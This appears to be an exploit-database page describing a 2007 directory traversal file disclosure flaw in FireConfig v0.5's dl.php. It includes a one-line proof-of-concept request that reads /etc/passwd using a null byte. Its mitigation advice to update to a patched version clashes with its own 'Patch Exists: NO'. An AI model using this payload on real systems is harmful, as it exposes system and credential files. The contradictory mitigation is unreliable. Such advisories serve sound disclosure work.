header-logo
Suggest Exploit
vendor:
FireConfig
by:
milw0rm.com
5.5
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: FireConfig
Affected Version From: FireConfig v0.5
Affected Version To: FireConfig v0.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose arbitrary files on the target system. By exploiting the dl.php file in FireConfig v0.5, an attacker can traverse the directory structure and access sensitive files such as /etc/passwd.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of FireConfig where this issue has been fixed.
Source

Exploit-DB raw data:

FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
  /dl.php?file=../../../../../../etc/passwd%00

# milw0rm.com [2007-10-28]

Navigation

Suggest Exploit

Services By CQR